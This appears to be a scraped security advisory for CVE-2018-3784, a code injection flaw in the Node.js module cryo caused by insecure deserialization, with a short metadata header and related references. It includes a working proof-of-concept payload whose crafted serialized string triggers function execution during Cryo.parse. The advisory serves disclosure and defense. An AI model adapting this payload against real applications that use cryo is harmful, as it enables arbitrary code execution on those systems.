Lucene search
Alexey TyurinNODEJS:690HistoryAug 16, 2018 - 7:50 p.m.
Code Injection
2018-08-1619:50:35
Alexey Tyurin
www.npmjs.com
8
0.002 Low
EPSS
Percentile
64.7%
Overview
All versions of cryo are vulnerable to code injection due to an Insecure implementation of deserialization.
Proof of concept
var Cryo = require('cryo');
var frozen = '{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\");return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}'
var hydrated = Cryo.parse(frozen);
console.log(hydrated);
Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available.
References
Related
veracode
veracode
Arbitrary Code Execution
2018-06-20 08:47:28
osv
osv
Code Injection in cryo
2018-08-21 17:02:43
hackerone
hackerone
nvd
nvd
CVE-2018-3784
2018-08-17 13:29:00
github
github
Code Injection in cryo
2018-08-21 17:02:43
cve
cve
CVE-2018-3784
2018-08-17 13:29:00
prion
prion
Deserialization of untrusted data
2018-08-17 13:29:00
cvelist
cvelist
CVE-2018-3784
2018-08-17 13:00:00